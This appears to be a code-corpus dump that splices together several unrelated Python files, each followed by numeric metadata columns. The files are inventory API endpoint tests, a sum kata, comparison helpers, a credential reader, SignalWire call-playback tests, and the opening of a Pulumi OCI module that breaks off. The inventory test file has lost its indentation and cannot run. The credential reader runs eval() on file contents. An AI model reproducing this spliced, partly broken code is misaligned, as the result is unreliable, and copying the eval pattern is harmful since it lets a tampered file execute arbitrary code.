# are made available under the terms of the Apache License, Version 2.0 #
# which accompanies this distribution, and is available at #
# http://www.apache.org/licenses/LICENSE-2.0 #
###############################################################################
from unittest.mock import patch
from api.test.api.responders_test.test_data import base
from api.test.api.responders_test.test_data import inventory
from api.test.api.test_base import TestBase
# Inventory endpoint tests: each case drives validate_get_request (from
# TestBase) with a query and asserts the expected HTTP status; @patch mocks
# replace the responder's DB read / env-name check where a success or
# not-found path must be simulated.
class TestInventory(TestBase):
# --- request validation failures (no mocks needed) ---
def test_get_objects_list_without_env_name(self):
self.validate_get_request(inventory.URL,
expected_code=base.BAD_REQUEST_CODE)
def test_get_objects_list_with_invalid_filter(self):
self.validate_get_request(inventory.URL,
params={
"invalid": "invalid"
},
expected_code=base.BAD_REQUEST_CODE)
def test_get_objects_list_with_non_boolean_subtree(self):
self.validate_get_request(inventory.URL,
params={
'env_name': base.ENV_NAME,
'sub_tree': base.NON_BOOL
},
expected_code=base.BAD_REQUEST_CODE)
# --- happy paths: the mocked read returns OBJECTS_LIST ---
@patch(base.RESPONDER_BASE_READ)
def test_get_objects_list_with_boolean_subtree(self, read):
self.validate_get_request(inventory.URL,
params={
'env_name': base.ENV_NAME,
'sub_tree': base.BOOL
},
mocks={
read: inventory.OBJECTS_LIST
},
expected_code=base.SUCCESSFUL_CODE,
expected_response=inventory.OBJECT_IDS_RESPONSE
)
def test_get_objects_list_with_non_int_page(self):
self.validate_get_request(inventory.URL,
params={
'env_name': base.ENV_NAME,
'page': base.NON_INT_PAGE
},
expected_code=base.BAD_REQUEST_CODE)
@patch(base.RESPONDER_BASE_READ)
def test_get_objects_list_with_int_page(self, read):
self.validate_get_request(inventory.URL,
params={
'env_name': base.ENV_NAME,
'page': base.INT_PAGE
},
mocks={
read: inventory.OBJECTS_LIST
},
expected_code=base.SUCCESSFUL_CODE,
expected_response=inventory.OBJECT_IDS_RESPONSE
)
def test_get_objects_list_with_non_int_pagesize(self):
self.validate_get_request(inventory.URL,
params={
'env_name': base.ENV_NAME,
'page_size': base.NON_INT_PAGESIZE
},
expected_code=base.BAD_REQUEST_CODE)
@patch(base.RESPONDER_BASE_READ)
def test_get_objects_list_with_int_pagesize(self, read):
self.validate_get_request(inventory.URL,
params={
'env_name': base.ENV_NAME,
'page_size': base.INT_PAGESIZE
},
mocks={
read: inventory.OBJECTS_LIST
},
expected_code=base.SUCCESSFUL_CODE,
expected_response=inventory.OBJECT_IDS_RESPONSE
)
# --- empty read result: known env -> 404, unknown env -> 400 ---
@patch(base.RESPONDER_BASE_READ)
@patch(base.RESPONDER_BASE_CHECK_ENVIRONMENT_NAME)
def test_get_nonexistent_objects_list_with_env_name(self, check_env_name, read):
self.validate_get_request(inventory.URL,
params={
'env_name': base.ENV_NAME,
},
mocks={
read: [],
check_env_name: True
},
expected_code=base.NOT_FOUND_CODE,
)
@patch(base.RESPONDER_BASE_READ)
@patch(base.RESPONDER_BASE_CHECK_ENVIRONMENT_NAME)
def test_get_objects_list_with_unkown_env_name(self, check_env_name, read):
self.validate_get_request(inventory.URL,
params={
'env_name': base.ENV_NAME,
},
mocks={
read: [],
check_env_name: False
},
expected_code=base.BAD_REQUEST_CODE)
# --- single-object lookups by id ---
@patch(base.RESPONDER_BASE_READ)
def test_get_object_with_env_name_and_id(self, read):
self.validate_get_request(inventory.URL,
params={
'env_name': base.ENV_NAME,
'id': inventory.ID
},
mocks={
read: inventory.OBJECTS
},
expected_code=base.SUCCESSFUL_CODE,
expected_response=inventory.OBJECTS[0]
)
@patch(base.RESPONDER_BASE_READ)
@patch(base.RESPONDER_BASE_CHECK_ENVIRONMENT_NAME)
def test_get_nonexistent_object_with_env_name_and_id(self, check_env_name, read):
self.validate_get_request(inventory.URL,
params={
'env_name': base.ENV_NAME,
'id': inventory.NONEXISTENT_ID
},
mocks={
read: [],
check_env_name: True
},
expected_code=base.NOT_FOUND_CODE)
@patch(base.RESPONDER_BASE_READ)
@patch(base.RESPONDER_BASE_CHECK_ENVIRONMENT_NAME)
def test_get_object_with_unkown_env_name_and_id(self, check_env_name, read):
self.validate_get_request(inventory.URL,
params={
'env_name': base.UNKNOWN_ENV,
'id': inventory.ID
},
mocks={
read: [],
check_env_name: False
},
expected_code=base.BAD_REQUEST_CODE)
| 48.762195
| 85
| 0.421408
| 633
| 7,997
| 4.93049
| 0.159558
| 0.0785
| 0.041653
| 0.091637
| 0.806472
| 0.789491
| 0.783403
| 0.760013
| 0.728292
| 0.701378
| 0
| 0.003258
| 0.501063
| 7,997
| 163
| 86
| 49.06135
| 0.778947
| 0.063024
| 0
| 0.594203
| 0
| 0
| 0.020587
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.094203
| false
| 0
| 0.028986
| 0
| 0.130435
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bbd2e823867aa1a21c9e18ffaa4bdf4fe3e1d42d
| 145
|
py
|
Python
|
python/8kyu/add_numbers.py
|
Sigmanificient/codewars
|
b34df4bf55460d312b7ddf121b46a707b549387a
|
[
"MIT"
] | 3
|
2021-06-08T01:57:13.000Z
|
2021-06-26T10:52:47.000Z
|
python/8kyu/add_numbers.py
|
Sigmanificient/codewars
|
b34df4bf55460d312b7ddf121b46a707b549387a
|
[
"MIT"
] | null | null | null |
python/8kyu/add_numbers.py
|
Sigmanificient/codewars
|
b34df4bf55460d312b7ddf121b46a707b549387a
|
[
"MIT"
] | 2
|
2021-06-10T21:20:13.000Z
|
2021-06-30T10:13:26.000Z
|
# Kata url: https://www.codewars.com/kata/5926d7494b2b1843780001e6.
from typing import Tuple
def add(*n: int) -> int:
    """Return the sum of all arguments; 0 when called with none.

    Fix: the annotation was `*n: Tuple[int]`, which claims each single
    argument is a tuple of ints; with *args the annotation describes one
    element, so the correct type is plain `int`.
    """
    return sum(n)
| 20.714286
| 67
| 0.710345
| 21
| 145
| 4.904762
| 0.809524
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.16129
| 0.144828
| 145
| 6
| 68
| 24.166667
| 0.669355
| 0.448276
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
a550442093389369e7cd359e95717d7d3af699b0
| 89
|
py
|
Python
|
pyECLAT/__init__.py
|
jeffrichardchemistry/pyECLAT
|
c5cd6976e9703acc148072177192b9b1bff855d5
|
[
"BSD-2-Clause"
] | 17
|
2020-06-05T19:24:10.000Z
|
2021-12-30T12:41:41.000Z
|
pyECLAT/__init__.py
|
BlackCurrantDS/pyECLAT
|
ac6b71dadb5eed4f97f9ecab8395f8e5440adbf7
|
[
"BSD-2-Clause"
] | null | null | null |
pyECLAT/__init__.py
|
BlackCurrantDS/pyECLAT
|
ac6b71dadb5eed4f97f9ecab8395f8e5440adbf7
|
[
"BSD-2-Clause"
] | 7
|
2021-01-22T11:46:19.000Z
|
2022-03-10T18:01:01.000Z
|
from .pyECLAT import ECLAT
from .pyECLAT import Example1
from .pyECLAT import Example2
| 14.833333
| 29
| 0.808989
| 12
| 89
| 6
| 0.5
| 0.458333
| 0.708333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.026667
| 0.157303
| 89
| 5
| 30
| 17.8
| 0.933333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
a562ee2dd6d6cf8b25336c012ced7cd754125a13
| 2,597
|
py
|
Python
|
website/utilities/extras/statements.py
|
skulluglify/skulluglify_app
|
944dd168b0b0d868a7eb43938a8390cb54b4eee3
|
[
"BSD-3-Clause"
] | null | null | null |
website/utilities/extras/statements.py
|
skulluglify/skulluglify_app
|
944dd168b0b0d868a7eb43938a8390cb54b4eee3
|
[
"BSD-3-Clause"
] | null | null | null |
website/utilities/extras/statements.py
|
skulluglify/skulluglify_app
|
944dd168b0b0d868a7eb43938a8390cb54b4eee3
|
[
"BSD-3-Clause"
] | null | null | null |
#! /usr/bin/env python3
'''
equals
greater
less
'''
class equals (object):
    """equals(a, b, ...) -> True when every argument compares equal.

    Acts as a predicate: __new__ returns a bool, never an instance.
    Fix: equals() with zero arguments used to raise StopIteration from a
    bare next(); it now returns True (vacuous truth), consistent with
    the single-argument case.
    """

    def __new__ (cls, *args, **kwargs):
        return cls._equals (args)

    @staticmethod
    def _equals (args):
        it = iter(args)
        # Default sentinel prevents StopIteration on empty input; the loop
        # simply doesn't run, so the result is True.
        first = next(it, None)
        for other in it:
            if first != other:
                return False
        return True
class greater (object):
    """greater(a, b, ...) -> True when the arguments strictly decrease.

    greater() with no arguments returns a helper object exposing
    .than(...) (strict) and .than_equals(...) (non-strict) comparisons.
    """

    def __new__ (cls, *args, **kwargs):
        # (Re)attach the fluent helpers on every construction, exactly as
        # the generated instance API expects.
        setattr (cls, "than", lambda self, *x: cls._greater_than(x))
        setattr (cls, "than_equals", lambda self, *x: cls._greater_than_equals(x))
        if args:
            # Called with values: act as a predicate, no instance created.
            return cls._greater_than(args)
        return super(cls.__class__, cls).__new__(cls)

    def __init__ (self, *args, **kwargs):
        pass

    @staticmethod
    def _greater_than (values):
        it = iter(values)
        prev = next(it)
        for current in it:
            if not prev > current:
                return False
            prev = current
        return True

    @staticmethod
    def _greater_than_equals (values):
        it = iter(values)
        prev = next(it)
        for current in it:
            if not prev >= current:
                return False
            prev = current
        return True
class less (object):
    """less(a, b, ...) -> True when the arguments strictly increase.

    less() with no arguments returns a helper object exposing
    .than(...) (strict) and .than_equals(...) (non-strict) comparisons.
    """

    def __new__ (cls, *args, **kwargs):
        # (Re)attach the fluent helpers on every construction, exactly as
        # the generated instance API expects.
        setattr (cls, "than", lambda self, *x: cls._less_than(x))
        setattr (cls, "than_equals", lambda self, *x: cls._less_than_equals(x))
        if args:
            # Called with values: act as a predicate, no instance created.
            return cls._less_than(args)
        return super(cls.__class__, cls).__new__(cls)

    def __init__ (self, *args, **kwargs):
        pass

    @staticmethod
    def _less_than (values):
        it = iter(values)
        prev = next(it)
        for current in it:
            if not prev < current:
                return False
            prev = current
        return True

    @staticmethod
    def _less_than_equals (values):
        it = iter(values)
        prev = next(it)
        for current in it:
            if not prev <= current:
                return False
            prev = current
        return True
| 25.213592
| 82
| 0.488256
| 298
| 2,597
| 4.040268
| 0.137584
| 0.053987
| 0.052326
| 0.070598
| 0.898671
| 0.898671
| 0.859635
| 0.859635
| 0.859635
| 0.781561
| 0
| 0.001969
| 0.413169
| 2,597
| 103
| 83
| 25.213592
| 0.788058
| 0.016173
| 0
| 0.807229
| 0
| 0
| 0.011802
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.120482
| false
| 0.024096
| 0
| 0.012048
| 0.277108
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3c74093fb0dab613bc930840aa117fb3b12102cf
| 326
|
py
|
Python
|
cgi-bin/db_util.py
|
pinckert/pinckert.com
|
7d6ce3e37c6c39c1deebbceb40f4442d34c20e23
|
[
"Apache-2.0"
] | 1
|
2020-07-29T22:45:07.000Z
|
2020-07-29T22:45:07.000Z
|
cgi-bin/db_util.py
|
pinckert/pinckert.com
|
7d6ce3e37c6c39c1deebbceb40f4442d34c20e23
|
[
"Apache-2.0"
] | null | null | null |
cgi-bin/db_util.py
|
pinckert/pinckert.com
|
7d6ce3e37c6c39c1deebbceb40f4442d34c20e23
|
[
"Apache-2.0"
] | null | null | null |
#
# Read DB credentials
#
def db_cred(path="./db_connect/db_info.txt"):
    """Return the DB credential object parsed from *path*.

    Fixes an unresolved Git merge conflict: both sides of the
    <<<<<<</>>>>>>> markers contained the identical function, so the
    markers are removed and a single copy kept. The file handle is now
    closed via a context manager (the original leaked it), and the
    hard-coded path became a backward-compatible default parameter.

    :param path: credential file containing a Python literal.
    """
    # NOTE(security): eval() executes arbitrary code from the file — the
    # credential file must be fully trusted. ast.literal_eval would be a
    # safer drop-in if the file only ever holds a plain literal.
    with open(path, "r") as fp:
        info = fp.read()
    return eval(info)
| 18.111111
| 48
| 0.613497
| 42
| 326
| 4.619048
| 0.357143
| 0.061856
| 0.175258
| 0.206186
| 0.773196
| 0.773196
| 0.773196
| 0.773196
| 0.773196
| 0.773196
| 0
| 0.087912
| 0.162577
| 326
| 17
| 49
| 19.176471
| 0.622711
| 0.131902
| 0
| 0.727273
| 0
| 0
| 0.182482
| 0.175182
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
5905e607223a4e590a433381c4aabef5cbf90ff2
| 14,128
|
py
|
Python
|
signalwire/tests/relay/calling/test_call_play.py
|
ramarketing/signalwire-python
|
c0663bdd0454faaa39f42af7c936cea1d43e1842
|
[
"MIT"
] | 23
|
2018-12-19T14:48:18.000Z
|
2022-01-11T03:58:36.000Z
|
signalwire/tests/relay/calling/test_call_play.py
|
ramarketing/signalwire-python
|
c0663bdd0454faaa39f42af7c936cea1d43e1842
|
[
"MIT"
] | 13
|
2018-10-17T12:57:54.000Z
|
2021-09-01T21:46:01.000Z
|
signalwire/tests/relay/calling/test_call_play.py
|
ramarketing/signalwire-python
|
c0663bdd0454faaa39f42af7c936cea1d43e1842
|
[
"MIT"
] | 12
|
2020-01-21T14:29:43.000Z
|
2022-01-11T07:48:06.000Z
|
import asyncio
import json
import pytest
from unittest.mock import Mock, patch
async def _fire(calling, notification):
    # Deliver a fake Relay notification to the calling service. Declared
    # async only so tests can schedule it with asyncio.create_task (firing
    # the event while an awaited play*() call is in flight) or await it.
    calling.notification_handler(notification)
def mock_uuid():
    """Deterministic stand-in for uuid4 so control IDs are predictable."""
    fixed_id = 'control-id'
    return fixed_id
def test_play_events(relay_call):
    """A 'finished' play notification triggers both registered handlers."""
    handler = Mock()
    for event_name in ('play.stateChange', 'play.finished'):
        relay_call.on(event_name, handler)
    notification = json.loads('{"event_type":"calling.call.play","params":{"control_id":"control-id","call_id":"call-id","node_id":"node-id","state":"finished"}}')
    relay_call.calling.notification_handler(notification)
    assert handler.call_count == 2
@pytest.mark.asyncio
async def test_play_multiple_media_with_success(success_response, relay_call):
    """play() with a mixed media list succeeds once the 'finished' event fires."""
    with patch('signalwire.relay.calling.components.uuid4', mock_uuid):
        relay_call.calling.client.execute = success_response
        # Queue a 'playing' then a 'finished' notification to arrive while
        # play() is awaited below.
        payload = json.loads('{"event_type":"calling.call.play","params":{"control_id":"control-id","call_id":"call-id","node_id":"node-id","state":"playing"}}')
        asyncio.create_task(_fire(relay_call.calling, payload))  # Test 'playing' event before 'finished'
        payload = json.loads('{"event_type":"calling.call.play","params":{"control_id":"control-id","call_id":"call-id","node_id":"node-id","state":"finished"}}')
        asyncio.create_task(_fire(relay_call.calling, payload))
        media = [
            { 'type': 'audio', 'url': 'audio.mp3' },
            { 'type': 'tts', 'text': 'welcome', 'gender': 'male' },
            { 'type': 'silence', 'duration': 5 }
        ]
        result = await relay_call.play(media_list=media)
        assert result.successful
        assert result.event.payload['state'] == 'finished'
        # Inspect the outbound execute() message built by play().
        msg = relay_call.calling.client.execute.mock.call_args[0][0]
        assert msg.params == json.loads('{"protocol":"signalwire-proto-test","method":"calling.play","params":{"call_id":"call-id","node_id":"node-id","control_id":"control-id","play":[{"type":"audio","params":{"url":"audio.mp3"}},{"type":"tts","params":{"text":"welcome","gender":"male"}},{"type":"silence","params":{"duration":5}}]}}')
        relay_call.calling.client.execute.mock.assert_called_once()
@pytest.mark.asyncio
async def test_play_multiple_media_volume_with_success(success_response, relay_call):
    """play() forwards a negative volume value into the outbound message."""
    with patch('signalwire.relay.calling.components.uuid4', mock_uuid):
        relay_call.calling.client.execute = success_response
        payload = json.loads('{"event_type":"calling.call.play","params":{"control_id":"control-id","call_id":"call-id","node_id":"node-id","state":"finished"}}')
        # Fired while play() is awaited below.
        asyncio.create_task(_fire(relay_call.calling, payload))
        media = [
            { 'type': 'audio', 'url': 'audio.mp3' },
            { 'type': 'tts', 'text': 'welcome', 'gender': 'male' },
            { 'type': 'silence', 'duration': 5 }
        ]
        result = await relay_call.play(media_list=media, volume=-3.2)
        assert result.successful
        assert result.event.payload['state'] == 'finished'
        msg = relay_call.calling.client.execute.mock.call_args[0][0]
        assert msg.params == json.loads('{"protocol":"signalwire-proto-test","method":"calling.play","params":{"call_id":"call-id","node_id":"node-id","control_id":"control-id","play":[{"type":"audio","params":{"url":"audio.mp3"}},{"type":"tts","params":{"text":"welcome","gender":"male"}},{"type":"silence","params":{"duration":5}}],"volume":-3.2}}')
        relay_call.calling.client.execute.mock.assert_called_once()
@pytest.mark.asyncio
async def test_play_multiple_media_with_failure(fail_response, relay_call):
    """play() resolves unsuccessful when the execute request fails."""
    relay_call.calling.client.execute = fail_response
    media = [
        { 'type': 'audio', 'url': 'audio.mp3' },
        { 'type': 'tts', 'text': 'welcome', 'gender': 'male' },
        { 'type': 'silence', 'duration': 5 }
    ]
    result = await relay_call.play(media_list=media)
    assert not result.successful
    relay_call.calling.client.execute.mock.assert_called_once()
@pytest.mark.asyncio
async def test_play_async_multiple_media_with_success(success_response, relay_call):
    """play_async() returns a pending action that completes on 'finished'."""
    with patch('signalwire.relay.calling.components.uuid4', mock_uuid):
        relay_call.calling.client.execute = success_response
        media = [
            { 'type': 'audio', 'url': 'audio.mp3' },
            { 'type': 'tts', 'text': 'welcome', 'gender': 'male' },
            { 'type': 'silence', 'duration': 5 }
        ]
        action = await relay_call.play_async(media_list=media, volume=4.3)
        assert not action.completed
        # Complete the action now..
        payload = json.loads('{"event_type":"calling.call.play","params":{"control_id":"control-id","call_id":"call-id","node_id":"node-id","state":"finished"}}')
        await _fire(relay_call.calling, payload)
        assert action.completed
        msg = relay_call.calling.client.execute.mock.call_args[0][0]
        assert msg.params == json.loads('{"protocol":"signalwire-proto-test","method":"calling.play","params":{"call_id":"call-id","node_id":"node-id","control_id":"control-id","play":[{"type":"audio","params":{"url":"audio.mp3"}},{"type":"tts","params":{"text":"welcome","gender":"male"}},{"type":"silence","params":{"duration":5}}],"volume":4.3}}')
        relay_call.calling.client.execute.mock.assert_called_once()
@pytest.mark.asyncio
async def test_play_audio_media_with_success(success_response, relay_call):
    """play_audio() wraps the URL into a single-entry 'audio' play list."""
    with patch('signalwire.relay.calling.components.uuid4', mock_uuid):
        relay_call.calling.client.execute = success_response
        payload = json.loads('{"event_type":"calling.call.play","params":{"control_id":"control-id","call_id":"call-id","node_id":"node-id","state":"finished"}}')
        # Fired while play_audio() is awaited below.
        asyncio.create_task(_fire(relay_call.calling, payload))
        result = await relay_call.play_audio('audio.mp3')
        assert result.successful
        assert result.event.payload['state'] == 'finished'
        msg = relay_call.calling.client.execute.mock.call_args[0][0]
        assert msg.params == json.loads('{"protocol":"signalwire-proto-test","method":"calling.play","params":{"call_id":"call-id","node_id":"node-id","control_id":"control-id","play":[{"type":"audio","params":{"url":"audio.mp3"}}]}}')
        relay_call.calling.client.execute.mock.assert_called_once()
@pytest.mark.asyncio
async def test_play_audio_async_multiple_media_with_success(success_response, relay_call):
    """play_audio_async() stays pending until the 'finished' event is delivered."""
    with patch('signalwire.relay.calling.components.uuid4', mock_uuid):
        relay_call.calling.client.execute = success_response
        action = await relay_call.play_audio_async('audio.mp3')
        assert not action.completed
        # Complete the action now..
        payload = json.loads('{"event_type":"calling.call.play","params":{"control_id":"control-id","call_id":"call-id","node_id":"node-id","state":"finished"}}')
        await _fire(relay_call.calling, payload)
        assert action.completed
        msg = relay_call.calling.client.execute.mock.call_args[0][0]
        assert msg.params == json.loads('{"protocol":"signalwire-proto-test","method":"calling.play","params":{"call_id":"call-id","node_id":"node-id","control_id":"control-id","play":[{"type":"audio","params":{"url":"audio.mp3"}}]}}')
        relay_call.calling.client.execute.mock.assert_called_once()
@pytest.mark.asyncio
async def test_play_tts_media_with_success(success_response, relay_call):
    """play_tts() builds a single-entry 'tts' play list from text/gender."""
    with patch('signalwire.relay.calling.components.uuid4', mock_uuid):
        relay_call.calling.client.execute = success_response
        payload = json.loads('{"event_type":"calling.call.play","params":{"control_id":"control-id","call_id":"call-id","node_id":"node-id","state":"finished"}}')
        # Fired while play_tts() is awaited below.
        asyncio.create_task(_fire(relay_call.calling, payload))
        result = await relay_call.play_tts(text='welcome', gender='male')
        assert result.successful
        assert result.event.payload['state'] == 'finished'
        msg = relay_call.calling.client.execute.mock.call_args[0][0]
        assert msg.params == json.loads('{"protocol":"signalwire-proto-test","method":"calling.play","params":{"call_id":"call-id","node_id":"node-id","control_id":"control-id","play":[{"type":"tts","params":{"text":"welcome","gender":"male"}}]}}')
        relay_call.calling.client.execute.mock.assert_called_once()
@pytest.mark.asyncio
async def test_play_tts_async_multiple_media_with_success(success_response, relay_call):
    """play_tts_async() with volume completes once 'finished' is delivered."""
    with patch('signalwire.relay.calling.components.uuid4', mock_uuid):
        relay_call.calling.client.execute = success_response
        action = await relay_call.play_tts_async(text='welcome', gender='male', volume=5.0)
        assert not action.completed
        # Complete the action now..
        payload = json.loads('{"event_type":"calling.call.play","params":{"control_id":"control-id","call_id":"call-id","node_id":"node-id","state":"finished"}}')
        await _fire(relay_call.calling, payload)
        assert action.completed
        msg = relay_call.calling.client.execute.mock.call_args[0][0]
        assert msg.params == json.loads('{"protocol":"signalwire-proto-test","method":"calling.play","params":{"call_id":"call-id","node_id":"node-id","control_id":"control-id","play":[{"type":"tts","params":{"text":"welcome","gender":"male"}}],"volume":5.0}}')
        relay_call.calling.client.execute.mock.assert_called_once()
@pytest.mark.asyncio
async def test_play_silence_media_with_success(success_response, relay_call):
    """play_silence('5') emits a numeric duration in the outbound message."""
    with patch('signalwire.relay.calling.components.uuid4', mock_uuid):
        relay_call.calling.client.execute = success_response
        payload = json.loads('{"event_type":"calling.call.play","params":{"control_id":"control-id","call_id":"call-id","node_id":"node-id","state":"finished"}}')
        # Fired while play_silence() is awaited below.
        asyncio.create_task(_fire(relay_call.calling, payload))
        result = await relay_call.play_silence('5')
        assert result.successful
        assert result.event.payload['state'] == 'finished'
        msg = relay_call.calling.client.execute.mock.call_args[0][0]
        assert msg.params == json.loads('{"protocol":"signalwire-proto-test","method":"calling.play","params":{"call_id":"call-id","node_id":"node-id","control_id":"control-id","play":[{"type":"silence","params":{"duration":5}}]}}')
        relay_call.calling.client.execute.mock.assert_called_once()
@pytest.mark.asyncio
async def test_play_silence_async_multiple_media_with_success(success_response, relay_call):
    """play_silence_async() stays pending until 'finished' is delivered."""
    with patch('signalwire.relay.calling.components.uuid4', mock_uuid):
        relay_call.calling.client.execute = success_response
        action = await relay_call.play_silence_async('5')
        assert not action.completed
        # Complete the action now..
        payload = json.loads('{"event_type":"calling.call.play","params":{"control_id":"control-id","call_id":"call-id","node_id":"node-id","state":"finished"}}')
        await _fire(relay_call.calling, payload)
        assert action.completed
        msg = relay_call.calling.client.execute.mock.call_args[0][0]
        assert msg.params == json.loads('{"protocol":"signalwire-proto-test","method":"calling.play","params":{"call_id":"call-id","node_id":"node-id","control_id":"control-id","play":[{"type":"silence","params":{"duration":5}}]}}')
        relay_call.calling.client.execute.mock.assert_called_once()
@pytest.mark.asyncio
async def test_play_multiple_media_with_error_event(success_response, relay_call):
    """An 'error' play event makes the awaited play() result unsuccessful."""
    with patch('signalwire.relay.calling.components.uuid4', mock_uuid):
        relay_call.calling.client.execute = success_response
        payload = json.loads('{"event_type":"calling.call.play","params":{"control_id":"control-id","call_id":"call-id","node_id":"node-id","state":"error"}}')
        # Fired while play() is awaited below.
        asyncio.create_task(_fire(relay_call.calling, payload))
        media = [
            { 'type': 'audio', 'url': 'audio.mp3' }
        ]
        result = await relay_call.play(media_list=media)
        assert not result.successful
        assert result.event.payload['state'] == 'error'
        relay_call.calling.client.execute.mock.assert_called_once()
@pytest.mark.asyncio
async def test_play_async_multiple_media_with_error_event(success_response, relay_call):
    """An 'error' event completes the async action with an unsuccessful result."""
    with patch('signalwire.relay.calling.components.uuid4', mock_uuid):
        relay_call.calling.client.execute = success_response
        media = [
            { 'type': 'audio', 'url': 'audio.mp3' }
        ]
        action = await relay_call.play_async(media_list=media)
        assert not action.completed
        payload = json.loads('{"event_type":"calling.call.play","params":{"control_id":"control-id","call_id":"call-id","node_id":"node-id","state":"error"}}')
        await _fire(relay_call.calling, payload)
        assert action.completed
        assert not action.result.successful
        relay_call.calling.client.execute.mock.assert_called_once()
@pytest.mark.asyncio
async def test_play_ringtone_with_success(success_response, relay_call):
    """play_ringtone(name=...) builds a single-entry 'ringtone' play list."""
    with patch('signalwire.relay.calling.components.uuid4', mock_uuid):
        relay_call.calling.client.execute = success_response
        payload = json.loads('{"event_type":"calling.call.play","params":{"control_id":"control-id","call_id":"call-id","node_id":"node-id","state":"finished"}}')
        # Fired while play_ringtone() is awaited below.
        asyncio.create_task(_fire(relay_call.calling, payload))
        result = await relay_call.play_ringtone(name='us')
        assert result.successful
        assert result.event.payload['state'] == 'finished'
        msg = relay_call.calling.client.execute.mock.call_args[0][0]
        assert msg.params == json.loads('{"protocol":"signalwire-proto-test","method":"calling.play","params":{"call_id":"call-id","node_id":"node-id","control_id":"control-id","play":[{"type":"ringtone","params":{"name":"us"}}]}}')
        relay_call.calling.client.execute.mock.assert_called_once()
@pytest.mark.asyncio
async def test_play_ringtone_async_with_success(success_response, relay_call):
    """play_ringtone_async() includes duration and completes on 'finished'."""
    with patch('signalwire.relay.calling.components.uuid4', mock_uuid):
        relay_call.calling.client.execute = success_response
        action = await relay_call.play_ringtone_async(duration=40, name='us')
        assert not action.completed
        # Complete the action now..
        payload = json.loads('{"event_type":"calling.call.play","params":{"control_id":"control-id","call_id":"call-id","node_id":"node-id","state":"finished"}}')
        await _fire(relay_call.calling, payload)
        assert action.completed
        msg = relay_call.calling.client.execute.mock.call_args[0][0]
        assert msg.params == json.loads('{"protocol":"signalwire-proto-test","method":"calling.play","params":{"call_id":"call-id","node_id":"node-id","control_id":"control-id","play":[{"type":"ringtone","params":{"name":"us","duration":40}}]}}')
        relay_call.calling.client.execute.mock.assert_called_once()
| 62.791111
| 347
| 0.713052
| 1,929
| 14,128
| 5.021773
| 0.046656
| 0.078972
| 0.089192
| 0.088572
| 0.950346
| 0.935584
| 0.935584
| 0.928771
| 0.924228
| 0.904821
| 0
| 0.005932
| 0.093148
| 14,128
| 224
| 348
| 63.071429
| 0.750156
| 0.011891
| 0
| 0.722772
| 0
| 0.128713
| 0.390525
| 0.355622
| 0
| 0
| 0
| 0
| 0.267327
| 1
| 0.009901
| false
| 0
| 0.019802
| 0.00495
| 0.034653
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
595f5d818048ac1cd26aa10f03f9047176c20d60
| 104,506
|
py
|
Python
|
sdk/python/pulumi_oci/devops/deploy_stage.py
|
EladGabay/pulumi-oci
|
6841e27d4a1a7e15c672306b769912efbfd3ba99
|
[
"ECL-2.0",
"Apache-2.0"
] | 5
|
2021-08-17T11:14:46.000Z
|
2021-12-31T02:07:03.000Z
|
sdk/python/pulumi_oci/devops/deploy_stage.py
|
pulumi-oci/pulumi-oci
|
6841e27d4a1a7e15c672306b769912efbfd3ba99
|
[
"ECL-2.0",
"Apache-2.0"
] | 1
|
2021-09-06T11:21:29.000Z
|
2021-09-06T11:21:29.000Z
|
sdk/python/pulumi_oci/devops/deploy_stage.py
|
pulumi-oci/pulumi-oci
|
6841e27d4a1a7e15c672306b769912efbfd3ba99
|
[
"ECL-2.0",
"Apache-2.0"
] | 2
|
2021-08-24T23:31:30.000Z
|
2022-01-02T19:26:54.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['DeployStageArgs', 'DeployStage']
@pulumi.input_type
